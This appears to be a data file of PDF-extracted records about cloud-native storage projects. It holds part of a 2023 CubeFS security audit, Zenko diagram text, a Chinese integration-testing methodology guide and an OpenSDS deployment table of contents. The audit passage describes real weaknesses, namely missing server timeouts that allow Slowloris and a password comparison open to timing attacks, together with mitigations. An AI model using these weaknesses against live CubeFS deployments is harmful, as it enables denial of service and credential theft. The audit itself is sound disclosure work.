a nil-pointer dereference on 145 in the below code snippet:\nhttps://github.com/cubefs/cubefs/blob/6a0d5fa45a77\u000020c752fa9e44738bf5d86c84bd/objectn\node/acl_handler.go#L110-L153\n1func (o *ObjectNode) getObjectACLHandler (w http.ResponseWriter, r *http.Request) {\n2 var (\n3 err error\n4 erc *ErrorCode\n5 )\n6 defer func() {\n7 o.errorResponse (w, r, err, erc)\n8 }()\n9\n10 param := ParseRequestParam (r)\n11 if param.Bucket() == \"\" {\n12 erc = InvalidBucketName\n13 return\n14 }\n15 if param.Object() == \"\" {\n16 erc = InvalidKey\n17 return\n18 }\n19\n20 var vol *Volume\n21 if vol, err = o. 
getVol(param.bucket); err != nil {\n22 log.LogErrorf (\"getObjectACLHandler: load volume fail: requestID(%v) \nvolume(%v) err(%v)\" ,\n23 GetRequestID (r), param.bucket, err)\nCubeFS 2023 Security Audit\n30\nAda Logics Ltd24 return\n25 }\n26 var acl *AccessControlPolicy\n27 if acl, err = getObjectACL (vol, param.object, true); err != nil {\n28 log.LogErrorf (\"getObjectACLHandler: get acl fail: requestID(%v) \nvolume(%v) path(%v) err(%v)\" ,\n29 GetRequestID (r), param.bucket, param.object, err)\n30 if err == syscall.ENOENT {\n31 erc = NoSuchKey\n32 }\n33 return\n34 }\n35 var data [] byte\n36 if data, err = acl. XmlMarshal (); err != nil {\n37 log.LogErrorf (\"getObjectACLHandler: xml marshal fail: requestID(%v) \nvolume(%v) path(%v) acl(%+v) err(%v)\" ,\n38 GetRequestID (r), param.bucket, param.object, acl, err)\n39 return\n40 }\n41\n42 writeSuccessResponseXML (w, data)\n43 return\n44}\nOn line 136 getObjectACLHandler invokes getObjectACL . If this returns nil, nil , then a nil-\npointer dereference will be triggered on line 145.\nMitigation\nUnmarshal into a single pointer instead of a double pointer.\nCubeFS 2023 Security Audit\n31\nAda Logics LtdPotential Slowloris attacks\nSeverity: Low\nStatus: Fixed\nId: ADA-CUBEFS-AMK23ghJVHJ\nComponent: AuthNode\nSlowloris is a type of attack where an attacker opens a connection between their controlled\nmachine and the victim's server. Once the attacker has opened the connection, they keep it\nopen for as long as possible. They will do the same with a large number of controlled machines\nto hog the available connections and prevent other users from accessing the service. As such,\nthe victim's server stays up but remains busy from processing the attacker's requests and\nbecomes unavailable to legitimate users.\nAn attacker can exploit a Slowloris issue by identifying execution paths in their target\napplication that cause it to take longer time to return from, and the attacker can then send\nrequests that force the application into these. The fact that Cubefs's Master server is susceptible\nto a Slowloris attack does not mean that it is easily exploitable.AuthNode\nhttps://github.com/cubefs/cubefs/blob/9c9f0bad65fc4a904160\u000022cdaba2d9d6becd7c/authnode/http_server.go#L37-L44\n37 srv := &http.Server{\n38 Addr: colonSplit + m.port,\n39 TLSConfig: cfg,\n40 }\n41 if err := srv. ListenAndServeTLS (\"/app/server.crt\" , \"/app/server.key\" ); \nerr != nil {\n42 log.LogErrorf (\"action[startHTTPService] failed,err[%v]\" , err)\n43 panic(err)\n44 }\nMaster\nThe root cause of the Master server Slowloris issue is that is does not declare a timeout. On line\n50 below, startHTTPService declares the HTTP Server with address and handler but does not\ndeclare a timeout.\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/master/http_server.go#L37-L64\n37func (m *Server) startHTTPService (modulename string, cfg *config.Config) {\n38 router := mux. NewRouter ().SkipClean (true)\n39 m.registerAPIRoutes (router)\n40 m.registerAPIMiddleware (router)\n41 if m.cluster.authenticate {\n42 m.registerAuthenticationMiddleware (router)\n43 }\n44 exporter. InitWithRouter (modulename, cfg, router, m.port)\n45 addr := fmt. Sprintf(\":%s\", m.port)\n46 if m.bindIp {\n47 addr = fmt. Sprintf(\"%s:%s\" , m.ip, m.port)\n48 }\n49\n50 var server = &http.Server{\n51 Addr: addr,\n52 Handler: router,\n53 }\n54\n55 var serveAPI = func() {\n56 if err := server. 
ListenAndServe (); err != nil {\n57 log.LogErrorf (\"serveAPI: serve http server failed: err(%v)\" , err)\n58 return\n59 }\n60 }\n61 go serveAPI ()\nCubeFS 2023 Security Audit\n32\nAda Logics Ltd62 m.apiServer = server\n63 return\n64}\nThe server does not have a timeout at all because the server has specified neither ReadTimeout\nnor ReadHeaderTimeout . This grants an attacker ample flexibility and possibilities for getting the\nserver to hang. Note that the server also does not have write timeouts, which adds to an\nattacker's possibilities of triggering this.\nBelow, we enumerate all other HTTP servers that do not specify timeouts. We do not include\ntests and examples.\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/cmd/cmd.go#L135-L144\n135 if mod.graceful {\n136 programEntry := func(state *graceful.State) {\n137 router, handlers := mod. SetUp()\n138\n139 httpServer := &http.Server{\n140 Addr: cfg.BindAddr,\n141 Handler: reorderMiddleWareHandlers (router, lh, cfg.BindAddr, \ncfg.Auth, handlers),\n142 }\n143\n144 log.Info(\"server is running at:\" , cfg.BindAddr)\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/cmd/cmd.go#L171-L174\n171 httpServer := &http.Server{\n172 Addr: cfg.BindAddr,\n173 Handler: reorderMiddleWareHandlers (router, lh, cfg.BindAddr, cfg.Auth, \nhandlers),\n174 }\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/common/ra\u0000 server/transp\nort.go#L70-L73\n70 tr.httpSvr = &http.Server{\n71 Addr: fmt. Sprintf(\":%d\", port),\n72 Handler: router,\n73 }\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/blobstore/common/consul/consul.go\n#L216-L227\n216 srv = &http.Server{}\n217 srv.Addr = ln. Addr().String()\n218 port = ln. Addr().(*net.TCPAddr).Port\n219 log.Info(\"start health check server on: \" , srv.Addr)\n220 http.HandleFunc (patten, healthCheck)\n221 go func() {\n222 httpError := srv. Serve(ln.(*net.TCPListener))\n223 if httpError != nil && httpError != http.ErrServerClosed {\n224 log.Fatalf(\"health server HTTP error: \" , httpError)\n225 }\n226 log.Info(\"health check server exit\" )\n227 }()\nhttps://github.com/cubefs/cubefs/blob/5ab518b3598ee99a74b333d0d2abc80739bbae4d/objectnode/server.go#L463-L473\n463 var server = &http.Server{\n464 Addr: \":\" + o.listen,\n465 Handler: router,\n466 }\n467\n468 go func() {\n469 if err = server. ListenAndServe (); err != nil {\n470 log.LogErrorf (\"startMuxRestAPI: start http server fail, err(%v)\" , err)\n471 return\n472 }\n473 }()\nCubeFS 2023 Security Audit\n33\nAda Logics LtdMitigation\nAdd timeouts when declaring the servers.\nCubeFS 2023 Security Audit\n34\nAda Logics LtdReleases are not signed\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-NJb32hjJBN\nComponent: CubeFS\nCubeFS releases are not signed, with keys available alongside releases. Signing releases and\nallowing consumers to verify them mitigates supply-chain risks.\nA tool like Cosign makes the signing process easy and low-e\u0000 ort and keeps the overhead for\nconsumers low to verify signatures. 
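To illustrate the underlying idea only, the generic crypto/ed25519 sketch below shows what a detached signature buys consumers; it is not how Cosign or the CubeFS release process is implemented. The publisher signs the artifact bytes with a private key and ships the signature alongside the artifact, and consumers verify it against the published public key before trusting the download.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"fmt"
)

func main() {
	// The release artifact, stood in for here by a byte slice.
	artifact := []byte("cubefs-release-archive-bytes")

	// Publisher side: generate a keypair once, then sign each release artifact.
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	sig := ed25519.Sign(priv, artifact)

	// Consumer side: verify the detached signature before trusting the artifact.
	if ed25519.Verify(pub, artifact, sig) {
		fmt.Println("signature valid: artifact was not tampered with")
	} else {
		fmt.Println("signature invalid: reject the artifact")
	}
}
```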
These signatures should be available with releases.\nMitigation\nRelease signing by way of Cosign can be adopted by way of the o\u0000icial Cosign Github Action:\nhttps://github.com/marketplace/actions/cosign-installer.\nCubeFS 2023 Security Audit\n35\nAda Logics LtdSecurity Disclosure Email Does Not Work\nSeverity: Low\nStatus: Fixed\nId: ADA-CUBEFS-vc34CGVVJB\nComponent: Security Policy\nDuring the audit, Ada Logics attempted to disclose a finding to the email address listed in\nCubeFS's security disclosure guidelines:\nhttps://github.com/cubefs/cubefs/blob/master/SECURITY.md. The email bounced, and the\nCubeFS team did not receive the security finding.\nThis could prevent or discourage community members from contributing to CubeFS's security\nposture. We recommend regularly ensuring that communication channels for responsible\nsecurity disclosures are tested.\nDuring the security audit, the CubeFS maintainers enable disclosures through the Github\ninterface.\nCubeFS 2023 Security Audit\n36\nAda Logics LtdTiming attack can leak user passwords\nSeverity: Moderate\nStatus: Fixed\nId: ADA-CUBEFS-Jh2iu3423b\nComponent: Master\nSummary\nCubeFS uses a string comparison for user passwords that is prone to timing attacks. A timing\nattack is a side-channel attack whereby an attacker observes the response time from an\napplication and can deduce the number of matching characters in their payload against the\ncontrol string.Details\nCubeFS password validation routine:\nhttps://github.com/cubefs/cubefs/blob/fdfa176a97e0fbb57c953e2b4a3aebe329e2a631/master/gapi_user.go#L337-L356\n337func (s *UserService) validatePassword (ctx context.Context, args struct {\n338 UserID string\n339 Password string\n340}) (*proto.UserInfo, error) {\n341 ui, err := s.user. getUserInfo (args.UserID)\n342 if err != nil {\n343 return nil, err\n344 }\n345\n346 ak, err := s.user. getAKUser (ui.AccessKey)\n347 if err != nil {\n348 return nil, err\n349 }\n350\n351 if ak.Password != args.Password {\n352 log.LogWarnf (\"user:[%s] login pass word has err\" , args.UserID)\n353 return nil, fmt.Errorf(\"user or password has err\" )\n354 }\n355 return ui, nil\n356}\n... is prone to a timing/side channel attack due to the way CubeFS compares the two passwords\non this line:\nhttps://github.com/cubefs/cubefs/blob/fdfa176a97e0fbb57c953e2b4a3aebe329e2a631/master/gapi_user.go#L351\n351 if ak.Password != args.Password {\nFor similar issues in the Go ecosystem, which include technical discussions about timing\nattacks and mitigation, see:https://github.com/advisories/GHSA-mq6f-5xh5-hgcf\nhttps://github.com/gin-gonic/gin/issues/3168\nImpact\nThis vulnerability allows unauthenticated users to escalate privileges to the level corresponding\nto the highest privileged user in the UserService. If there are users with root permissions being\nauthenticated by validatePassword , this is the possible level of privilege escalation.\nAll CubeFS users using the Master UserService s validatePassword to validate user passwords are\nimpacted by this.\nCubeFS 2023 Security Audit\n37\nAda Logics Ltd" } ]
{ "category": "Runtime", "file_name": "XDM_cluster_NoNFS.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "Figure (text extracted from a deployment diagram): an XDM cluster without NFS, showing Server 1 (Master), Server 2, and Server 3 each running XDM services on K8S, a client, a CLI, Orbit, an XDM instance, and connections to RING, AWS, GCP, and Azure." } ]
{ "category": "Runtime", "file_name": "集成测试方法.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
[ { "data": "How to Do Integration Testing

Contents
1. Overview
1.1 Approach
1.2 Goal
1.3 Questions integration testing should consider
2. What integration testing covers
2.1 Functional testing
2.2 Exception testing
2.3 Scale testing
2.4 Concurrency/stress testing
3. Test-case design method
3.1 Design principles
3.2 Theory behind test-case design
3.3 Test-case template
3.4 Design steps
3.4.1 Module analysis
3.4.2 Interface analysis
3.4.3 Condition filtering
3.4.4 Case design
3.4.5 Scenario design
3.4.6 Code implementation
3.4.7 Iteration and supplementation

1. Overview
Integration testing builds on unit testing. It is the activity of verifying, while the software units are assembled into modules, subsystems, or systems according to the high-level design specification, whether each part works as required and meets the corresponding technical targets.

1.1 Approach
There are many ways to do integration testing, but they boil down to two: the "big bang" approach, in which all units are assembled at once and tested together, and the incremental approach, in which units are added and tested layer by layer.

1.2 Goal
The goal of integration testing is to use components that have passed unit testing to build the program structure required by the design. High quality in individual modules is not enough to guarantee the quality of the whole system; many hidden failures come from unexpected interactions between high-quality modules.
Integration testing makes sure that the units, once combined, cooperate as intended, and that each increment behaves correctly. What it tests includes the interfaces between units and the functionality after integration.

1.3 Questions integration testing should consider
1. When the modules are connected, can data be lost while crossing module interfaces?
2. When the sub-functions are combined, do they achieve the expected parent function?
3. Can one module's functionality adversely affect another module's functionality?
4. Are there problems with the global data structures?
5. Which system assembly method will be used for the integration test?
6. In what order should the modules be connected during integration testing?
7. Are module coding and testing progress consistent with the integration order?
8. Is special hardware needed during testing?
9. Do the errors of individual modules accumulate and get amplified to an unacceptable degree?
Therefore, after unit testing it is necessary to run integration tests to find and eliminate the problems above that may occur when modules are connected, and finally build the required software subsystem or system. For a subsystem, integration testing is also called component testing.

2. What integration testing covers
This section describes what we mainly need to test when doing integration testing of our modules.

2.1 Functional testing
From the user's point of view, test the functionality the module provides thoroughly. Before functional testing, sufficient test cases must be designed so that the module keeps working correctly and returns the expected results under all kinds of system states and parameter inputs.
This requires a systematic case-design method which fully considers the possible input scenarios, guarantees that no functionality is left untested, and completes the test with as few cases and execution steps as possible.
Conventional functional testing is usually black-box testing and pays little attention to the implementation. However, to consider the possible parameter values fully and to cut unnecessary condition-combination cases, integration testing of a module needs some understanding of its internals, so grey-box testing is used.
The specific case-design method is described in the Test-case design method section below.

2.2 Exception testing
Exception testing is a test type distinct from functional and performance testing. It uncovers problems caused by system faults, faults in dependent services, faults in the application itself, and so on, and improves the stability of the system.
Common faults include disk errors, network errors, corrupted data, process restarts, and so on.

2.3 Scale testing
Test whether the module still works correctly at a given scale, whether it misbehaves or crashes, and watch the usage of system resources. For example, test whether opening a very large number of files causes errors and whether memory usage becomes excessive.

2.4 Concurrency/stress testing
Functional testing is mostly single-threaded, so the module also has to be tested under concurrency to see whether it still works correctly and whether logic or data errors appear.
When choosing the level of concurrency, test with a fairly heavy load, for example 2x, 10x, or more of the usual load.

3. Test-case design method
A test case is a set of test inputs, execution conditions, and expected results developed to verify that a program meets a specific system requirement; its organization, functional coverage, and repeatability guarantee that no functionality is left untested. Because test cases often involve multiple branches and nested loops, the number of distinct paths can be very large, so cases must be designed carefully to get the best testing effect.

3.1 Design principles
First decide from which angle to approach case design. One angle is the interface: design the cases from the way the interfaces are divided. The other is the usage scenario, for example operations performed during a snapshot or during a clone.

Designing cases by interface
Pros:
1. Cases can be designed from the different interface parameters and the different expected results they produce, so the possible call situations are covered fairly completely.
Cons:
1. The approach is abstract; it is not obvious in which scenario a given case would occur.
2. Designing cases from the functionality an interface provides sometimes makes it hard to catch functional defects that only appear in special scenarios.

Designing cases by scenario
Pros:
1. Reviewers can easily understand the scenario in which each group of cases occurs.
2. It can expose scenarios that were not considered when the functionality was designed.
Cons:
1. It is hard to show that case coverage is sufficient.

The two approaches have complementary strengths, so consider combining them: design the cases by interface, then organize the execution sequence of the cases by scenario.
Designing by interface makes it fairly easy to judge whether case coverage is complete; the cases are then executed scenario by scenario, and every executed case is ticked off. This makes it clear which cases have and have not been executed and helps discover scenarios that were not thought of.
In addition, special scenarios help reveal whether the interface functionality was thought through; the two approaches complement each other and help find more problems.

3.2 Theory behind test-case design
Test-case design is guided by a lot of theory; a few commonly used methods are listed here. Our case design draws on, but is not limited to, the following methods.

Combinatorial testing
An interface, feature, or system uses several parameters, each parameter has several possible values, and different combinations of parameter values lead to different results, but the number of combinations can be very large and produce far too many cases.
For example, suppose we need to verify IE compatibility on PCs with different hardware configurations. Statistics show the PC configurations of the main user groups (figure omitted from this extract) and the IE versions that need to be verified (figure omitted from this extract).
In that scenario, covering every combination of parameter values requires 3*3*4*2*4*4 = 1152 cases; this is known as combinatorial explosion.
The purpose of combinatorial testing, abstractly, is to provide a way out of combinatorial explosion; simply put, it is a method of generating fewer test cases while preserving the defect-detection rate. It abstracts the system (or module) under test as a system influenced by multiple factors, extracts the possible values of each factor, and applies a combinatorial method to generate the final test cases. Commonly used combinatorial methods include:
1. Two-factor combination testing (also called pairwise or all-pairs testing): the generated test set covers all value combinations of any two variables. In theory this set can expose every defect triggered by the joint effect of two variables.
2. Multi-factor (t-way, t > 2) combination testing: the generated test set covers all value combinations of any t variables. In theory this set can find every defect triggered by the joint effect of t factors.
3. Base-choice coverage: first pick a base combination containing a base value for every parameter; the most commonly used valid value is recommended as the base value. Starting from the base combination, change one parameter value at a time to generate new combination cases.
The theory and methods of combinatorial testing are not expanded further here.

Equivalence-class partitioning
Partition all input data sensibly into a number of equivalence classes and take one value from each class as a test input; a small amount of representative test data then gives good test results.
Valid equivalence class: the set of input data that is reasonable and meaningful with respect to the program specification.
Invalid equivalence class: exactly the opposite of the valid equivalence class.
When designing test cases, consider both kinds of classes, because the software must not only accept reasonable data but also withstand the unexpected. Only then does testing give the software higher reliability.
How to partition equivalence classes
Six principles for determining equivalence classes:
1. If an input condition specifies a range of values or a number of values, one valid equivalence class and two invalid equivalence classes can be established.
2. If an input condition specifies a set of input values or a "must be" condition, one valid equivalence class and one invalid equivalence class can be established.
3. If the input condition is a boolean, one valid equivalence class and one invalid equivalence class can be determined.
4. If a group of input values is specified (say n of them) and the program handles each of them separately, n valid equivalence classes and one invalid equivalence class can be established.
5. If a rule that the input data must obey is specified, one valid equivalence class (obeying the rule) and several invalid equivalence classes (violating the rule from different angles) can be established.
6. If it is known that the elements of an already-partitioned equivalence class are handled differently by the program, that class should be split further into smaller equivalence classes.
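As a small illustration of how these principles turn into test code, the table-driven sketch below takes one representative input per equivalence class, plus the boundary values discussed in the next subsection, for a hypothetical checkRange function that accepts values in [1, 100]. It is only an example of the method (written in Go for brevity), not actual Curve test code:

```go
// file: range_test.go (illustrative)
package example

import (
	"fmt"
	"testing"
)

// checkRange is a hypothetical function under test that accepts values in [1, 100].
func checkRange(v int) error {
	if v < 1 || v > 100 {
		return fmt.Errorf("value %d out of range", v)
	}
	return nil
}

// TestCheckRange uses one representative input per equivalence class and adds
// the boundary values of the valid class, so five cases cover the input space.
func TestCheckRange(t *testing.T) {
	cases := []struct {
		name    string
		input   int
		wantErr bool
	}{
		{"valid class, nominal value", 50, false},
		{"valid class, lower boundary (min)", 1, false},
		{"valid class, upper boundary (max)", 100, false},
		{"invalid class, below the range (min-1)", 0, true},
		{"invalid class, above the range (max+1)", 101, true},
	}
	for _, c := range cases {
		if err := checkRange(c.input); (err != nil) != c.wantErr {
			t.Errorf("%s: checkRange(%d) error = %v, wantErr %v", c.name, c.input, err, c.wantErr)
		}
	}
}
```

Each row plays the role of one case in the GWT template introduced in section 3.3 below, with the case name acting as Given/When and wantErr as Then.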
6、在确知已划分的等价类中各元素在程序处理中的方式不同的情况下,则应再将该等价类进一步的划分为更小的等价类。\n边界值分析\n在最小值、略高于最小值、正常值、略低于最大值和最大值处取输入变量值\n例如:涉及两个变量的函数x1,x2© XXX Page 6 of 8表示方法min、min+、nom、max-、和max\nX1的取值x1min,x1min+,x1nom,x1max-,x1max\nX2的取值x2min,x2min+,x2nom,x2max,x2max\n其他方法\n状态迁移法、 流程分析法、 判定表分析法、 因果图法等等。\n总结\n前面三种方法是常用的用例设计方法,并且各种方法之间可以结合使用,根据实际的场景选用合适的设计方法。\n在对接口或者系统做用例设计时,需要根据参数的不同取值组合来设计用例,可以覆盖所有的情况。但是如果考虑所有的组合,在很多情况下用例集会非常庞大,这种情况下就要使用组合测试来减少用例数,同时\n保证充分的覆盖率。\n此外有些接口的参数取值并不是离散的,这种情况下可以使用等价类划分或者边界值分析法来划分参数取值。举例来说,对于DataStore的WriteChunk接口的sn来说,sn可以为大于0的任意整数,利用等价类划分法\n,可以将sn与chunk的sn和correctedSn对比,划分为大于chunk的sn、等于chunk的sn和小于chunk的sn跟大于chunk的correctedSn、等于chunk的correctedSn和小于chunk的correctedSn的条件组合。\n3.3 用例模板\n用例设计可以遵循GWT(Given-When-Then)的模式来写,Given表示给定的前提条件,When表示要发生的操作,Then表示预期的结果。\n如果要覆盖所有的用例,那么势必要列出所有的前提条件,然后在特定的前提下,需要列出所有可能发生的操作。\n编号 Given When Then 备注 是否执行\n1       \n单元测试\n集成测试\n2       \n单元测试\n集成测试\n3       \n单元测试\n集成测试\n3.4 设计步骤\n整个设计可以按照以下步骤来执行:\n3.4.1.模块分析\n首先需要了解要测试模块以及组成此模块的其余子模块的功能,可以通过设计文档也可以通过代码实现来了解。© XXX Page 7 of 8需要知道这一模块负责的主要功能,模块维护的一些状态,模块记录了哪些信息等等。\n以DataStore为例,首先DataStore下组合了LocalFIleSystem和ChunkfilePool两个子模块,对外提供将对chunk的操作转化为对本地文件的操作的功能;\n该模块主要管理chunk文件及其快照文件,维护chunk文件的属性和数据。\n3.4.2.接口分析\n对接口提供的功能、输入参数、输出结果、实现原理等进行分析,根据接口内部逻辑和模块维护的状态对各参数进行等价类划分。\n一般来说输入参数在内部都会存在一些判断逻辑,这些判断的逻辑就可作为等价类划分的依据;一个参数可以与不同的状态进行对比分成多个条件项,不同条件项可以根据对比结果分类分成多个具体的条件。\n以DataStore的ReadChunk接口为例,主要包含了id、sn、offset、length这些参数,id这个参数对应了一个chunk的状态,即chunk是否存在、快照是否存在、是否为clone\nchunk,从而三个条件项,每个条件项有根据是否成立分成两个条件;\nsn作用是跟chunk的sn和correctedsn进行对比分成两个条件项,对比结果可以划分为sn>chunkinfo.sn、sn<chunkinfo.sn、sn==chunkinfo.sn(边界值)三组条件,以及和correctedSn对比的三组条件;\noffset、length可以与chunksize对比作为一个条件项,判断读取区域chunk之前是否写过又作为一个条件项。\n3.4.3.条件筛选\n如果要完全覆盖情况,需要将上面列出来的各组条件项进行全排列组合,这样用例数会非常大。但是这也只有在各条件项之间完全独立的情况下才可能出现,在实际设计时,各条件项之间存在着各种关系,我们可\n以利用这种关系来减少用例数。\n常见的一些关系:\n依赖:\n某一条件项A存在的前提依赖于另一条件项B的某一条件m成立,这样一来就可以过滤A的各条件与m的组合。\n例如DataStore的ReadChunk接口,快照是否存在这一条件项依赖于chunk存在的前提,否则这一条件项就没有意义。\n互斥:\n有些条件项之间是互斥的,必然不会一起出现的,这样就可以过滤掉这两个条件项的条件之间的组合。\n例如DataStore的ReadChunk接口,快照存在,则chunk必然不是clone chunk;chunk如果是clone chunk就必然不存在快照。\n等价处理\n有些条件项不同条件在接口中的处理方式是一样的,这种情况下可以去除这一条件项,或者写用例的时候可以穿插着用不同条件来写。\n例如ReadChunk接口,对于是否为clone chunk,接口处理是一样的,所以这个条件项实际上没什么意义;可以去掉,但是对这个接口来说比较好的方法是将这两个条件当成一个条件与其他条件进行组合,\n但是组合时可以随机的使用clone chunk或普通chunk作为这个条件,这样可以减少一半的用例。\n条件阻断\n代码的实现逻辑中,条件都是顺序执行的,某一条件符合的情况下,才会判断下一个条件,如果某一条件成立情况下函数返回了,后面的判断就必然不会继续下去了,那么在这一条件成立情况下,与后面条件的组\n合就可以过滤掉。\n但是这个需要对代码逻辑要比较了解,对于复杂的判断逻辑会较难处理。这里原则上认为对于比较简单的,且逻辑顺序基本不会发生变化的,可以应用这条方法。© XXX Page 8 of 8例如DataStore的WriteChunk接口,如果offset+length>chunksize,就一定会返回OutOfRangeError,那么在这种情况其实只需要测一组就可以了,与其他条件的组合可以过滤掉。\n上面列出的是常见的一些筛选用例的办法,其他还可以根据实际的一些情况进行筛选。\n3.4.4.用例设计\n当上面的分析做完以后就可以开始写用例了,用例的模板可以参照上面的表格。\n写用例时尽量将相同功能或接口的用例写在一起,相同Given条件下的写一起,然后一次改变一个条件(除非要利用组合测试)。\nGiven里给出前提条件,例如DataStore是对chunk的操作,前提条件就是当前chunk的状态;When就是输入参数的条件组合;Then就是预期的结果。\n3.4.5.场景设计\n有了上面的用例后,在考虑实际的场景来设计执行步骤。一个场景里面会包含不同接口的使用,但是每次调用必然能对应到某一条用例,如果没找到对应用例,那就是用例设计有遗漏,需要补充用例。\n3.4.6.代码实现\n根据场景设计中的步骤来写代码,然后检查是否与用例预期结果一致。用例跑完通过后,在对应的用例后面打钩记录。\n3.4.7.迭代补充\n检查用例是否都执行了,如果没有执行分析是不是场景有遗漏,需要进行补充。原则上来说,用例是需要百分百覆盖的。" } ]
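The integration-test design notes above (集成测试方法.pdf) describe trimming a combinatorial explosion of test conditions through equivalence classes, dependency rules (依赖) and condition blocking (条件阻断), using DataStore ReadChunk/WriteChunk as the running example. A minimal Go sketch of that pruning step follows; the condition names and the two pruning rules are illustrative assumptions lifted from the text, not Curve's actual (C++) test harness.

```go
package main

import "fmt"

// conditionItem is one 条件项 from the document's ReadChunk example and the
// equivalence classes its value can fall into. Names are illustrative only.
type conditionItem struct {
	name   string
	values []string
}

func main() {
	items := []conditionItem{
		{"chunkExists", []string{"yes", "no"}},
		{"snVsChunkSn", []string{"sn<chunk.sn", "sn==chunk.sn", "sn>chunk.sn"}},
		{"rangeCheck", []string{"offset+len<=chunksize", "offset+len>chunksize"}},
	}

	// Build the full cross product of condition values.
	var all [][]string
	var walk func(i int, cur []string)
	walk = func(i int, cur []string) {
		if i == len(items) {
			all = append(all, append([]string(nil), cur...))
			return
		}
		for _, v := range items[i].values {
			walk(i+1, append(cur, v))
		}
	}
	walk(0, nil)

	// Prune the cross product with the two rules described in the text.
	seenOutOfRange := false
	var kept [][]string
	for _, c := range all {
		// 依赖: the sn/range conditions are meaningless when the chunk does
		// not exist, so keep a single representative for that branch.
		if c[0] == "no" && (c[1] != items[1].values[0] || c[2] != items[2].values[0]) {
			continue
		}
		// 条件阻断: offset+len>chunksize always returns OutOfRangeError, so
		// one such case is enough.
		if c[2] == "offset+len>chunksize" {
			if seenOutOfRange {
				continue
			}
			seenOutOfRange = true
		}
		kept = append(kept, c)
	}

	fmt.Printf("full cross product: %d cases, after pruning: %d cases\n", len(all), len(kept))
	for _, c := range kept {
		fmt.Println(c)
	}
}
```

Running the sketch shows the 12-case cross product collapsing to 5 cases, which is the effect the document aims for before the surviving cases are written out in the GWT (Given-When-Then) table.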
{ "category": "Runtime", "file_name": "Zenko_arch.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "OrbitCloudserverTransient\nSource \nAWS\nGCP\nAzureS3C/RINGZenko\nClient\nZenko \nNFS\nBackbeat\nKa�a\nqueuebucket & object \nnamespace\nMongoDBClouds( d a t a a n d\nm e t a d a t a )CLINFSsproxyd" } ]
{ "category": "Runtime", "file_name": "OpenSDS Bali POC Deployment.pdf", "project_name": "Soda Foundation", "subcategory": "Cloud Native Storage" }
[ { "data": " \n OpenSDS Bali POC Deployment January 2019 Author: OpenSDS OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT ii Document Revision History Version Date Comments 0.1 7/12/2018 Initial revision. 0.2 12/22/2018 Updated to Bali version. 0.3 1/23/2019 Add ports info 0.4 1/24/2019 Updated ports info Related Documents Author Documents OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT iii Table of Contents 1 System requirements............................................................................................ 1 1.1 Hardware .................................................................................................................................. 1 1.2 Software .................................................................................................................................... 1 \n OS ....................................................................................................................................... 1 2 Installation............................................................................................................. 1 2.1 Prerequisite for two hosts ....................................................................................................... 2 \n Packages ............................................................................................................................. 2 \n Golang ................................................................................................................................ 2 \n Docker ................................................................................................................................ 3 \n Docker-compose ................................................................................................................ 3 \n Ansible ............................................................................................................................... 3 \n DRBD ................................................................................................................................. 4 2.2 Deployment on host 1 .............................................................................................................. 4 \n OpenSDS Deployment ...................................................................................................... 4 2.2.1.1 Download opensds-installer code .................................................................................... 4 2.2.1.2 Configure OpenSDS cluster variables ............................................................................ 4 2.2.1.2.1 System environment ............................................................................................. 4 2.2.1.2.2 LVM ....................................................................................................................... 5 2.2.1.2.3 Ceph ....................................................................................................................... 5 2.2.1.2.4 Cinder .................................................................................................................... 5 2.2.1.3 Check if the hosts can be reached ..................................................................................... 6 2.2.1.4 Run opensds-ansible playbook to start deploy ................................................................. 6 \n Configure FusionStorage Backend ................................................................................... 
6 \n Configure Dorado Storage Backend ................................................................................. 7 \n Configure Host-based replication .................................................................................... 9 \n Kubernetes Local Cluster Deployment .......................................................................... 10 2.2.5.1 Install Etcd .................................................................................................................. 10 2.2.5.2 kubernetes local cluster................................................................................................. 10 \n CSI Plugin Deployment .................................................................................................. 10 2.2.6.1 Download nbp source code ........................................................................................... 10 2.2.6.2 Configure CSI Plugin configmap .................................................................................. 10 OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT iv 2.2.6.3 Install CSI Plugin ........................................................................................................ 11 2.3 Deployment on host 2 ............................................................................................................ 11 \n OpenSDS Deployment .................................................................................................... 11 2.3.1.1 Download opensds-installer code .................................................................................. 11 2.3.1.2 Configure OpenSDS cluster variables .......................................................................... 11 2.3.1.2.1 System environment ........................................................................................... 11 2.3.1.2.2 LVM ..................................................................................................................... 12 2.3.1.2.3 Ceph ..................................................................................................................... 12 2.3.1.2.4 Cinder .................................................................................................................. 12 2.3.1.3 Check if the hosts can be reached ................................................................................... 13 2.3.1.4 Run opensds-ansible playbook to start deploy ............................................................... 13 \n Configure FusionStorage Backend ................................................................................. 13 \n Configure Dorado Storage Backend ............................................................................... 14 \n Configure Host-based replication .................................................................................. 15 \n Devstack(Openstack) Deployment ................................................................................. 16 2.3.5.1 Install OpenStack using devstack ................................................................................. 16 \n Configure Cinder Compatible API in OpenSDS ........................................................... 17 2.3.6.1 Installation .................................................................................................................. 17 2.4 Check OpenSDS ...................................................................................................................... 
